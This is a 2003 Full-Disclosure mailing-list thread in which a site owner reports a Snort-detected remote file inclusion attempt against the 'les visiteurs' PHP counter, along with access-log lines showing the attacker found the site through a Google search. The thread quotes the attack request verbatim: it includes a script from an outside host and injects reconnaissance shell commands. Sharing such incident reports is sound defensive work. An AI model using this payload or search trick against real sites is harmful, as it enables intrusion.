i was curious about how they found my site stats (the where in a not-standard-directory...)
looks like they googled their way in :) [EMAIL PROTECTED] evert]# zcat /var/log/httpd/access_log.1.gz | grep 200.138.213.246 200.138.213.246 - - [29/Nov/2003:20:53:13 +0100] "GET /counter/?view=year&ypd=1 HTTP/1.1" 200 14565 "http://www.google.com.br/search?num=100&hl=pt-BR&ie=UTF-8&oe=UTF-8&q=allinu rl%3A+%3Fview%3Dyear+ypd%3D1&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" 200.138.213.246 - - [29/Nov/2003:20:53:14 +0100] "GET /counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid. org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls HTTP/1.1" 401 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" [EMAIL PROTECTED] evert]# kind regards, Evert > Hi Daniel , > They are kiddies... :( > I was looking the files and there are only high-risk-rated exploits > downloaded from packet storm , ptrace , etc . > And they are running remote php shells in their server.... xD > > See you in the IRC tonight ? > > Best regards, > ------------------------------- > 0x00->Lorenzo Hernandez Garcia-Hierro > 0x01->\x74\x72\x75\x6c\x75\x78 > 0x02->The truth is out there, > 0x03-> outside your mind . > __________________________________ > PGP: Keyfingerprint > 4ACC D892 05F9 74F1 F453 7D62 6B4E B53E 9180 5F5B > ID: 0x91805F5B > ********************************** > \x6e\x73\x72\x67 > \x73\x65\x63\x75\x72\x69\x74\x79 > \x72\x65\x73\x65\x61\x72\x63\x68 > http://www.nsrg-security.com > ______________________ > ----- Original Message ----- > From: "Dan" <[EMAIL PROTECTED]> > To: <[EMAIL PROTECTED]> > Sent: Monday, December 01, 2003 6:02 PM > Subject: Re: [Full-Disclosure] file inclusion (les visiteurs) > > > > This is the same set of files that I noticed last week(xfteam.net) it > seems > > they closed their domain down? (I cannot find it) > > Does anyone know if these ppl are a real sec organisation? or just some > > kiddies ? > > > > Cheers, > > Daniel. > > > > "Evert Daman" <[EMAIL PROTECTED]> wrote: > > > > > > > > last night snort detected this request: > > > > > > GET > > > > > > /counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid. > org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls > > > > > > > > > because i patched 'les visiteurs' as described by 'matthieu peschaud' > > > on bugtraq on the 26 of october nothing happend, but it looks like > someone > > > is trying to exploit this bug. > > > just want to mention it to this wonderfull list :) > > > > > > kind regards, > > > Evert > > > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.netsys.com/full-disclosure-charter.html > > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
